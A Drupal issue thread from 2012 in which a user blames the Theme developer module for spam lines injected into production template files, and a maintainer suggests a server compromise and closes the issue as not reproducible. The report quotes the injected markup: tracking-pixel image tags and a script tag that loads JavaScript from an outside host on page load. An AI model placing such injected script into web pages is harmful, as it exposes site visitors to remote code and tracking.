Closed (cannot reproduce)
Project:
Theme developer
Version:
7.x-1.x-dev
Component:
Code
Priority:
Major
Category:
Bug report
Assigned:
Unassigned
Reporter:
Created:
2 Apr 2012 at 14:34 UTC
Updated:
4 Aug 2012 at 22:25 UTC
i have enabled devel_themer module on prod website.
The following lines are included automatically on every template files.
<img src="http://r.casalemedia.com/j.gif?u=163519&s=1" width="1" height="1" alt="">
<img src="https://r.casalemedia.com/j.gif?u=163519&s=2" width="1" height="1" alt="">
<script src="http://vitamine.networldmedia.net/bts/genericJS.php?cid=918"></script>
i feel this spam comes from devel themer module. because following files has 45 times above lines included.
sites/default/files/tmp/devel_themer_906758614f0c5c4c6704f
Comments
Comment #0.0
lalit774 commentedcode
Comment #1
kenneth.venken commentedIt seems to me that your production server is infected with some kind of virus. It's hard to believe that theme developer is responsible for this.
Could you please provide some more info on why you think theme developer is causing this.
Does removing theme developer from the production server help in any way?
It could also be that one of your personal computers is infected. Try changing your ftp password and reuploading the uninfected template files from an uninfected computer.
Comment #2
lalit774 commentedhi,
i am working in linux OS only. so there is no option for virus. i am working on lot of servers. it impact on only one server. where Theme developer module is installed on production.
After that i removed that module from production. and remove spam inserted lines. now everything is working fine for me.
Comment #3
kenneth.venken commentedThat file is a temporary file and shouldn't be passed to the browser. I can see that your temporary directory is inside your public files directory. Could this be a security risk?
Are you on shared hosting and is your public files directory configured with chmod 777?
Have you tried reenabling theme developer to see how long it takes for the template files to get reinfected again? Why did you decide to remove theme developer to fix this? Perhaps it would have been sufficient to only remove the inserted lines from your template files.
Comment #4
kenneth.venken commentedHard to believe this is caused by theme developer. If you have a way to reproduce this, feel free to reopen this bug.
Comment #5
lalit774 commentedHi,
That website has very high traffic and popular in Canada. The client report us for that error. so i have investigated this error due to devel_themer module. i cann't enable this module on LIVE website. i will enable this module on production for my website. if i can reproduce this.
Thanks.
Comment #5.0
lalit774 commentedspam